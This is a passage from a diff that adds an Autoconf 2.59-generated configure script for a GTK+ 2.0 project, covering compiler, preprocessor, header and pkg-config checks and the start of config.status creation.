-ansi; that turns off useful extensions and +# breaks some systems' header files. +# AIX -qlanglvl=ansi +# Ultrix and OSF/1 -std1 +# HP-UX -Aa -D_HPUX_SOURCE +# SVR4 -Xc -D__EXTENSIONS__ +for ac_arg in "" -qlanglvl=ansi -std1 "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" +do + CC="$ac_save_CC $ac_arg" + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include +#include +#include +#include +/* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */ +struct buf { int x; }; +FILE * (*rcsopen) (struct buf *, struct stat *, int); +static char *e (p, i) + char **p; + int i; +{ + return p[i]; +} +static char *f (char * (*g) (char **, int), char **p, ...) +{ + char *s; + va_list v; + va_start (v,p); + s = g (p, va_arg (v,int)); + va_end (v); + return s; +} +int test (int i, double x); +struct s1 {int (*f) (int a);}; +struct s2 {int (*f) (double a);}; +int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int); +int argc; +char **argv; + +int +main () +{ + +return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1]; + + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + am_cv_prog_cc_stdc="$ac_arg"; break +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +done +CC="$ac_save_CC" + +fi + +if test -z "$am_cv_prog_cc_stdc"; then + echo "$as_me:$LINENO: result: none needed" >&5 +echo "${ECHO_T}none needed" >&6 +else + echo "$as_me:$LINENO: result: $am_cv_prog_cc_stdc" >&5 +echo "${ECHO_T}$am_cv_prog_cc_stdc" >&6 +fi +case "x$am_cv_prog_cc_stdc" in + x|xno) ;; + *) CC="$CC $am_cv_prog_cc_stdc" ;; +esac + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +echo "$as_me:$LINENO: checking how to run the C preprocessor" >&5 +echo $ECHO_N "checking how to run the C preprocessor... $ECHO_C" >&6 +# On Suns, sometimes $CPP names a directory. +if test -n "$CPP" && test -d "$CPP"; then + CPP= +fi +if test -z "$CPP"; then + if test "${ac_cv_prog_CPP+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + # Double quotes because CPP needs to be expanded + for CPP in "$CC -E" "$CC -E -traditional-cpp" "/lib/cpp" + do + ac_preproc_ok=false +for ac_c_preproc_warn_flag in '' yes +do + # Use a header file that comes with gcc, so configuring glibc + # with a fresh cross-compiler works. + # Prefer to if __STDC__ is defined, since + # exists even on freestanding compilers. + # On the NeXT, cc -E runs the code through the compiler's parser, + # not just through cpp. "Syntax error" is here to catch this case. + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#ifdef __STDC__ +# include +#else +# include +#endif + Syntax error +_ACEOF +if { (eval echo "$as_me:$LINENO: \"$ac_cpp conftest.$ac_ext\"") >&5 + (eval $ac_cpp conftest.$ac_ext) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } >/dev/null; then + if test -s conftest.err; then + ac_cpp_err=$ac_c_preproc_warn_flag + ac_cpp_err=$ac_cpp_err$ac_c_werror_flag + else + ac_cpp_err= + fi +else + ac_cpp_err=yes +fi +if test -z "$ac_cpp_err"; then + : +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + # Broken: fails on valid input. +continue +fi +rm -f conftest.err conftest.$ac_ext + + # OK, works on sane cases. Now check whether non-existent headers + # can be detected and how. + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include +_ACEOF +if { (eval echo "$as_me:$LINENO: \"$ac_cpp conftest.$ac_ext\"") >&5 + (eval $ac_cpp conftest.$ac_ext) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } >/dev/null; then + if test -s conftest.err; then + ac_cpp_err=$ac_c_preproc_warn_flag + ac_cpp_err=$ac_cpp_err$ac_c_werror_flag + else + ac_cpp_err= + fi +else + ac_cpp_err=yes +fi +if test -z "$ac_cpp_err"; then + # Broken: success on invalid input. +continue +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + # Passes both tests. +ac_preproc_ok=: +break +fi +rm -f conftest.err conftest.$ac_ext + +done +# Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. +rm -f conftest.err conftest.$ac_ext +if $ac_preproc_ok; then + break +fi + + done + ac_cv_prog_CPP=$CPP + +fi + CPP=$ac_cv_prog_CPP +else + ac_cv_prog_CPP=$CPP +fi +echo "$as_me:$LINENO: result: $CPP" >&5 +echo "${ECHO_T}$CPP" >&6 +ac_preproc_ok=false +for ac_c_preproc_warn_flag in '' yes +do + # Use a header file that comes with gcc, so configuring glibc + # with a fresh cross-compiler works. + # Prefer to if __STDC__ is defined, since + # exists even on freestanding compilers. + # On the NeXT, cc -E runs the code through the compiler's parser, + # not just through cpp. "Syntax error" is here to catch this case. + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#ifdef __STDC__ +# include +#else +# include +#endif + Syntax error +_ACEOF +if { (eval echo "$as_me:$LINENO: \"$ac_cpp conftest.$ac_ext\"") >&5 + (eval $ac_cpp conftest.$ac_ext) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } >/dev/null; then + if test -s conftest.err; then + ac_cpp_err=$ac_c_preproc_warn_flag + ac_cpp_err=$ac_cpp_err$ac_c_werror_flag + else + ac_cpp_err= + fi +else + ac_cpp_err=yes +fi +if test -z "$ac_cpp_err"; then + : +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + # Broken: fails on valid input. +continue +fi +rm -f conftest.err conftest.$ac_ext + + # OK, works on sane cases. Now check whether non-existent headers + # can be detected and how. + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include +_ACEOF +if { (eval echo "$as_me:$LINENO: \"$ac_cpp conftest.$ac_ext\"") >&5 + (eval $ac_cpp conftest.$ac_ext) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } >/dev/null; then + if test -s conftest.err; then + ac_cpp_err=$ac_c_preproc_warn_flag + ac_cpp_err=$ac_cpp_err$ac_c_werror_flag + else + ac_cpp_err= + fi +else + ac_cpp_err=yes +fi +if test -z "$ac_cpp_err"; then + # Broken: success on invalid input. +continue +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + # Passes both tests. +ac_preproc_ok=: +break +fi +rm -f conftest.err conftest.$ac_ext + +done +# Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. +rm -f conftest.err conftest.$ac_ext +if $ac_preproc_ok; then + : +else + { { echo "$as_me:$LINENO: error: C preprocessor \"$CPP\" fails sanity check +See \`config.log' for more details." >&5 +echo "$as_me: error: C preprocessor \"$CPP\" fails sanity check +See \`config.log' for more details." >&2;} + { (exit 1); exit 1; }; } +fi + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + + +echo "$as_me:$LINENO: checking for egrep" >&5 +echo $ECHO_N "checking for egrep... $ECHO_C" >&6 +if test "${ac_cv_prog_egrep+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if echo a | (grep -E '(a|b)') >/dev/null 2>&1 + then ac_cv_prog_egrep='grep -E' + else ac_cv_prog_egrep='egrep' + fi +fi +echo "$as_me:$LINENO: result: $ac_cv_prog_egrep" >&5 +echo "${ECHO_T}$ac_cv_prog_egrep" >&6 + EGREP=$ac_cv_prog_egrep + + +echo "$as_me:$LINENO: checking for ANSI C header files" >&5 +echo $ECHO_N "checking for ANSI C header files... $ECHO_C" >&6 +if test "${ac_cv_header_stdc+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include +#include +#include +#include + +int +main () +{ + + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + ac_cv_header_stdc=yes +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +ac_cv_header_stdc=no +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext + +if test $ac_cv_header_stdc = yes; then + # SunOS 4.x string.h does not declare mem*, contrary to ANSI. + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include + +_ACEOF +if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | + $EGREP "memchr" >/dev/null 2>&1; then + : +else + ac_cv_header_stdc=no +fi +rm -f conftest* + +fi + +if test $ac_cv_header_stdc = yes; then + # ISC 2.0.2 stdlib.h does not declare free, contrary to ANSI. + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include + +_ACEOF +if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | + $EGREP "free" >/dev/null 2>&1; then + : +else + ac_cv_header_stdc=no +fi +rm -f conftest* + +fi + +if test $ac_cv_header_stdc = yes; then + # /bin/cc in Irix-4.0.5 gets non-ANSI ctype macros unless using -ansi. + if test "$cross_compiling" = yes; then + : +else + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include +#if ((' ' & 0x0FF) == 0x020) +# define ISLOWER(c) ('a' <= (c) && (c) <= 'z') +# define TOUPPER(c) (ISLOWER(c) ? 'A' + ((c) - 'a') : (c)) +#else +# define ISLOWER(c) \ + (('a' <= (c) && (c) <= 'i') \ + || ('j' <= (c) && (c) <= 'r') \ + || ('s' <= (c) && (c) <= 'z')) +# define TOUPPER(c) (ISLOWER(c) ? ((c) | 0x40) : (c)) +#endif + +#define XOR(e, f) (((e) && !(f)) || (!(e) && (f))) +int +main () +{ + int i; + for (i = 0; i < 256; i++) + if (XOR (islower (i), ISLOWER (i)) + || toupper (i) != TOUPPER (i)) + exit(2); + exit (0); +} +_ACEOF +rm -f conftest$ac_exeext +if { (eval echo "$as_me:$LINENO: \"$ac_link\"") >&5 + (eval $ac_link) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && { ac_try='./conftest$ac_exeext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + : +else + echo "$as_me: program exited with status $ac_status" >&5 +echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +( exit $ac_status ) +ac_cv_header_stdc=no +fi +rm -f core *.core gmon.out bb.out conftest$ac_exeext conftest.$ac_objext conftest.$ac_ext +fi +fi +fi +echo "$as_me:$LINENO: result: $ac_cv_header_stdc" >&5 +echo "${ECHO_T}$ac_cv_header_stdc" >&6 +if test $ac_cv_header_stdc = yes; then + +cat >>confdefs.h <<\_ACEOF +#define STDC_HEADERS 1 +_ACEOF + +fi + + +pkg_modules="gtk+-2.0 >= 2.0.0" + + succeeded=no + + if test -z "$PKG_CONFIG"; then + # Extract the first word of "pkg-config", so it can be a program name with args. +set dummy pkg-config; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_path_PKG_CONFIG+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + case $PKG_CONFIG in + [\\/]* | ?:[\\/]*) + ac_cv_path_PKG_CONFIG="$PKG_CONFIG" # Let the user override the test with a path. + ;; + *) + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_path_PKG_CONFIG="$as_dir/$ac_word$ac_exec_ext" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + + test -z "$ac_cv_path_PKG_CONFIG" && ac_cv_path_PKG_CONFIG="no" + ;; +esac +fi +PKG_CONFIG=$ac_cv_path_PKG_CONFIG + +if test -n "$PKG_CONFIG"; then + echo "$as_me:$LINENO: result: $PKG_CONFIG" >&5 +echo "${ECHO_T}$PKG_CONFIG" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + fi + + if test "$PKG_CONFIG" = "no" ; then + echo "*** The pkg-config script could not be found. Make sure it is" + echo "*** in your path, or set the PKG_CONFIG environment variable" + echo "*** to the full path to pkg-config." + echo "*** Or see http://www.freedesktop.org/software/pkgconfig to get pkg-config." + else + PKG_CONFIG_MIN_VERSION=0.9.0 + if $PKG_CONFIG --atleast-pkgconfig-version $PKG_CONFIG_MIN_VERSION; then + echo "$as_me:$LINENO: checking for $pkg_modules" >&5 +echo $ECHO_N "checking for $pkg_modules... $ECHO_C" >&6 + + if $PKG_CONFIG --exists "$pkg_modules" ; then + echo "$as_me:$LINENO: result: yes" >&5 +echo "${ECHO_T}yes" >&6 + succeeded=yes + + echo "$as_me:$LINENO: checking PACKAGE_CFLAGS" >&5 +echo $ECHO_N "checking PACKAGE_CFLAGS... $ECHO_C" >&6 + PACKAGE_CFLAGS=`$PKG_CONFIG --cflags "$pkg_modules"` + echo "$as_me:$LINENO: result: $PACKAGE_CFLAGS" >&5 +echo "${ECHO_T}$PACKAGE_CFLAGS" >&6 + + echo "$as_me:$LINENO: checking PACKAGE_LIBS" >&5 +echo $ECHO_N "checking PACKAGE_LIBS... $ECHO_C" >&6 + PACKAGE_LIBS=`$PKG_CONFIG --libs "$pkg_modules"` + echo "$as_me:$LINENO: result: $PACKAGE_LIBS" >&5 +echo "${ECHO_T}$PACKAGE_LIBS" >&6 + else + PACKAGE_CFLAGS="" + PACKAGE_LIBS="" + ## If we have a custom action on failure, don't print errors, but + ## do set a variable so people can do so. + PACKAGE_PKG_ERRORS=`$PKG_CONFIG --errors-to-stdout --print-errors "$pkg_modules"` + echo $PACKAGE_PKG_ERRORS + fi + + + + else + echo "*** Your version of pkg-config is too old. You need version $PKG_CONFIG_MIN_VERSION or newer." + echo "*** See http://www.freedesktop.org/software/pkgconfig" + fi + fi + + if test $succeeded = yes; then + : + else + { { echo "$as_me:$LINENO: error: Library requirements ($pkg_modules) not met; consider adjusting the PKG_CONFIG_PATH environment variable if your libraries are in a nonstandard prefix so pkg-config can find them." >&5 +echo "$as_me: error: Library requirements ($pkg_modules) not met; consider adjusting the PKG_CONFIG_PATH environment variable if your libraries are in a nonstandard prefix so pkg-config can find them." >&2;} + { (exit 1); exit 1; }; } + fi + + + + + ac_config_files="$ac_config_files Makefile src/Makefile" +cat >confcache <<\_ACEOF +# This file is a shell script that caches the results of configure +# tests run on this system so they can be shared between configure +# scripts and configure runs, see configure's option --config-cache. +# It is not useful on other systems. If it contains results you don't +# want to keep, you may remove or edit it. +# +# config.status only pays attention to the cache file if you give it +# the --recheck option to rerun configure. +# +# `ac_cv_env_foo' variables (set or unset) will be overridden when +# loading this file, other *unset* `ac_cv_foo' will be assigned the +# following values. + +_ACEOF + +# The following way of writing the cache mishandles newlines in values, +# but we know of no workaround that is simple, portable, and efficient. +# So, don't put newlines in cache variables' values. +# Ultrix sh set writes to stderr and can't be redirected directly, +# and sets the high bit in the cache file unless we assign to the vars. +{ + (set) 2>&1 | + case `(ac_space=' '; set | grep ac_space) 2>&1` in + *ac_space=\ *) + # `set' does not quote correctly, so add quotes (double-quote + # substitution turns \\\\ into \\, and sed turns \\ into \). + sed -n \ + "s/'/'\\\\''/g; + s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\\2'/p" + ;; + *) + # `set' quotes correctly as required by POSIX, so do not add quotes. + sed -n \ + "s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1=\\2/p" + ;; + esac; +} | + sed ' + t clear + : clear + s/^\([^=]*\)=\(.*[{}].*\)$/test "${\1+set}" = set || &/ + t end + /^ac_cv_env/!s/^\([^=]*\)=\(.*\)$/\1=${\1=\2}/ + : end' >>confcache +if diff $cache_file confcache >/dev/null 2>&1; then :; else + if test -w $cache_file; then + test "x$cache_file" != "x/dev/null" && echo "updating cache $cache_file" + cat confcache >$cache_file + else + echo "not updating unwritable cache $cache_file" + fi +fi +rm -f confcache + +test "x$prefix" = xNONE && prefix=$ac_default_prefix +# Let make expand exec_prefix. +test "x$exec_prefix" = xNONE && exec_prefix='${prefix}' + +# VPATH may cause trouble with some makes, so we remove $(srcdir), +# ${srcdir} and @srcdir@ from VPATH if srcdir is ".", strip leading and +# trailing colons and then remove the whole line if VPATH becomes empty +# (actually we leave an empty line to preserve line numbers). +if test "x$srcdir" = x.; then + ac_vpsub='/^[ ]*VPATH[ ]*=/{ +s/:*\$(srcdir):*/:/; +s/:*\${srcdir}:*/:/; +s/:*@srcdir@:*/:/; +s/^\([^=]*=[ ]*\):*/\1/; +s/:*$//; +s/^[^=]*=[ ]*$//; +}' +fi + +DEFS=-DHAVE_CONFIG_H + +ac_libobjs= +ac_ltlibobjs= +for ac_i in : $LIBOBJS; do test "x$ac_i" = x: && continue + # 1. Remove the extension, and $U if already installed. + ac_i=`echo "$ac_i" | + sed 's/\$U\././;s/\.o$//;s/\.obj$//'` + # 2. Add them. + ac_libobjs="$ac_libobjs $ac_i\$U.$ac_objext" + ac_ltlibobjs="$ac_ltlibobjs $ac_i"'$U.lo' +done +LIBOBJS=$ac_libobjs + +LTLIBOBJS=$ac_ltlibobjs + + + +: ${CONFIG_STATUS=./config.status} +ac_clean_files_save=$ac_clean_files +ac_clean_files="$ac_clean_files $CONFIG_STATUS" +{ echo "$as_me:$LINENO: creating $CONFIG_STATUS" >&5 +echo "$as_me: creating $CONFIG_STATUS" >&6;} +cat >$CONFIG_STATUS <<_ACEOF +#! $SHELL +# Generated by $as_me. +# Run this file to recreate the current configuration. +# Compiler output produced by configure, useful for debugging +# configure, is in config.log if it exists. + +debug=false +ac_cs_recheck=false +ac_cs_silent=false +SHELL=\${CONFIG_SHELL-$SHELL} +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF +## --------------------- ## +## M4sh Initialization. ## +## --------------------- ## + +# Be Bourne compatible +if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then + emulate sh + NULLCMD=: + # Zsh 3.x and 4.x performs word splitting on ${1+"$@"}, which + # is contrary to our usage. Disable this feature. + alias -g '${1+"$@"}'='"$@"' +elif test -n "${BASH_VERSION+set}" && (set -o posix) >/dev/null 2>&1; then + set -o posix +fi +DUALCASE=1; export DUALCASE # for MKS sh + +# Support unset when possible. +if ( (MAIL=60; unset MAIL) || exit) >/dev/null 2>&1; then + as_unset=unset +else + as_unset=false +fi + + +# Work around bugs in pre-3.0 UWIN ksh. +$as_unset ENV MAIL MAILPATH +PS1='$ ' +PS2='> ' +PS4='+ ' + +# NLS nuisances. +for as_var in \ + LANG LANGUAGE LC_ADDRESS LC_ALL LC_COLLATE LC_CTYPE LC_IDENTIFICATION \ + LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER \ + LC_TELEPHONE LC_TIME +do + if (set +x; test -z "`(eval $as_var=C; export $as_var) 2>&1`"); then + eval $as_var=C; export $as_var + else + $as_unset $as_var + fi +done + +# Required to use basename. +if expr a : '\(a\)' >/dev/null 2>&1; then + as_expr=expr +else + as_expr=false +fi + +if (basename /) >/dev/null 2>&1 && test "X`basename / 2>&1`" = "X/"; then + as_basename=basename +else + as_basename=false +fi + + +# Name of the executable. +as_me=`$as_basename "$0" || +$as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ + X"$0" : 'X\(//\)$' \| \ + X"$0" : 'X\(/\)$' \| \ + . : '\(.\)' 2>/dev/null || +echo X/"$0" | + sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/; q; } + /^X\/\(\/\/\)$/{ s//\1/; q; } + /^X\/\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + + +# PATH needs CR, and LINENO needs CR and PATH. +# Avoid depending upon Character Ranges. +as_cr_letters='abcdefghijklmnopqrstuvwxyz' +as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' +as_cr_Letters=$as_cr_letters$as_cr_LETTERS +as_cr_digits='0123456789' +as_cr_alnum=$as_cr_Letters$as_cr_digits + +# The user is always right. +if test "${PATH_SEPARATOR+set}" != set; then + echo "#! /bin/sh" >conf$$.sh + echo "exit 0" >>conf$$.sh + chmod +x conf$$.sh + if (PATH="/nonexistent;."; conf$$.sh) >/dev/null 2>&1; then + PATH_SEPARATOR=';' + else + PATH_SEPARATOR=: + fi + rm -f conf$$.sh +fi + + + as_lineno_1=$LINENO + as_lineno_2=$LINENO + as_lineno_3=`(expr $as_lineno_1 + 1) 2>/dev/null` + test "x$as_lineno_1" != "x$as_lineno_2" && + test "x$as_lineno_3" = "x$as_lineno_2" || { + # Find who we are. Look in the path if we contain no path at all + # relative or not. + case $0 in + *[\\/]* ) as_myself=$0 ;; + *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break +done + + ;; + esac + # We did not find ourselves, most probably we were run as `sh COMMAND' + # in which case we are not to be found in the path. + if test "x$as_myself" = x; then + as_myself=$0 + fi + if test ! -f "$as_myself"; then + { { echo "$as_me:$LINENO: error: cannot find myself; rerun with an absolute path" >&5 +echo "$as_me: error: cannot find myself; rerun with an absolute path" >&2;} + { (exit 1); exit 1; }; } + fi + case $CONFIG_SHELL in + '') + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in /bin$PATH_SEPARATOR/usr/bin$PATH_SEPARATOR$PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for as_base in sh bash ksh sh5; do + case $as_dir in + /*) + if ("$as_dir/$as_base" -c ' + as_lineno_1=$LINENO + as_lineno_2=$LINENO + as_lineno_3=`(expr $as_lineno_1 + 1) 2>/dev/null` + test "x$as_lineno_1" != "x$as_lineno_2" && + test "x$as_lineno_3" = "x$as_lineno_2" ') 2>/dev/null; then + $as_unset BASH_ENV || test "${BASH_ENV+set}" != set || { BASH_ENV=; export BASH_ENV; } + $as_unset ENV || test "${ENV+set}" != set || { ENV=; export ENV; } + CONFIG_SHELL=$as_dir/$as_base + export CONFIG_SHELL + exec "$CONFIG_SHELL" "$0" ${1+"$@"} + fi;; + esac + done +done +;; + esac + + # Create $as_me.lineno as a copy of $as_myself, but with $LINENO + # uniformly replaced by the line number. The first 'sed' inserts a + # line-number line before each line; the second 'sed' does the real + # work. The second script uses 'N' to pair each line-number line + # with the numbered line, and appends trailing '-' during + # substitution so that $LINENO is not a special case at line end. + # (Raja R Harinath suggested sed '=', and Paul Eggert wrote the + # second 'sed' script. Blame Lee E. McMahon for sed's syntax. :-) + sed '=' <$as_myself | + sed ' + N + s,$,-, + : loop + s,^\(['$as_cr_digits']*\)\(.*\)[$]LINENO\([^'$as_cr_alnum'_]\),\1\2\1\3, + t loop + s,-$,, + s,^['$as_cr_digits']*\n,, + ' >$as_me.lineno && + chmod +x $as_me.lineno || + { { echo "$as_me:$LINENO: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&5 +echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2;} + { (exit 1); exit 1; }; } + + # Don't try to exec as it changes $[0], causing all sort of problems + # (the dirname of $[0] is not the place where we might find the + # original and so on. Autoconf is especially sensible to this). + . ./$as_me.lineno + # Exit status is that of the last command. + exit +} + + +case `echo "testing\c"; echo 1,2,3`,`echo -n testing; echo 1,2,3` in + *c*,-n*) ECHO_N= ECHO_C=' +' ECHO_T=' ' ;; + *c*,* ) ECHO_N=-n ECHO_C= ECHO_T= ;; + *) ECHO_N= ECHO_C='\c' ECHO_T= ;; +esac + +if expr a : '\(a\)' >/dev/null 2>&1; then + as_expr=expr +else + as_expr=false +fi + +rm -f conf$$ conf$$.exe conf$$.file +echo >conf$$.file +if ln -s conf$$.file conf$$ 2>/dev/null; then + # We could just check for DJGPP; but this test a) works b) is more generic + # and c) will remain valid once DJGPP supports symlinks (DJGPP 2.04). + if test -f conf$$.exe; then + # Don't use ln at all; we don't have any links + as_ln_s='cp -p' + else + as_ln_s='ln -s' + fi +elif ln conf$$.file conf$$ 2>/dev/null; then + as_ln_s=ln +else + as_ln_s='cp -p' +fi +rm -f conf$$ conf$$.exe conf$$.file + +if mkdir -p . 2>/dev/null; then + as_mkdir_p=: +else + test -d ./-p && rmdir ./-p + as_mkdir_p=false +fi + +as_executable_p="test -f" + +# Sed expression to map a string onto a valid CPP name. +as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" + +# Sed expression to map a string onto a valid variable name. +as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" + + +# IFS +# We need space, tab and new line, in precisely that order. +as_nl=' +' +IFS=" $as_nl" + +# CDPATH. +$as_unset CDPATH + +exec 6>&1 + +# Open the log real soon, to keep \$[0] and so on meaningful, and to +# report actual input values of CONFIG_FILES etc. instead of their +# values after options handling. Logging --version etc. is OK. +exec 5>>config.log +{ + echo + sed 'h;s/./-/g;s/^.../## /;s/...$/ ##/;p;x;p;x' <<_ASBOX +## Running $as_me. ## +_ASBOX +} >&5 +cat >&5 <<_CSEOF + +This file was extended by $as_me, which was +generated by GNU Autoconf 2.59. Invocation command line was + + CONFIG_FILES = $CONFIG_FILES + CONFIG_HEADERS = $CONFIG_HEADERS + CONFIG_LINKS = $CONFIG_LINKS + CONFIG_COMMANDS = $CONFIG_COMMANDS + $ $0 $@ + +_CSEOF +echo "on `(hostname || uname -n) 2>/dev/null | sed 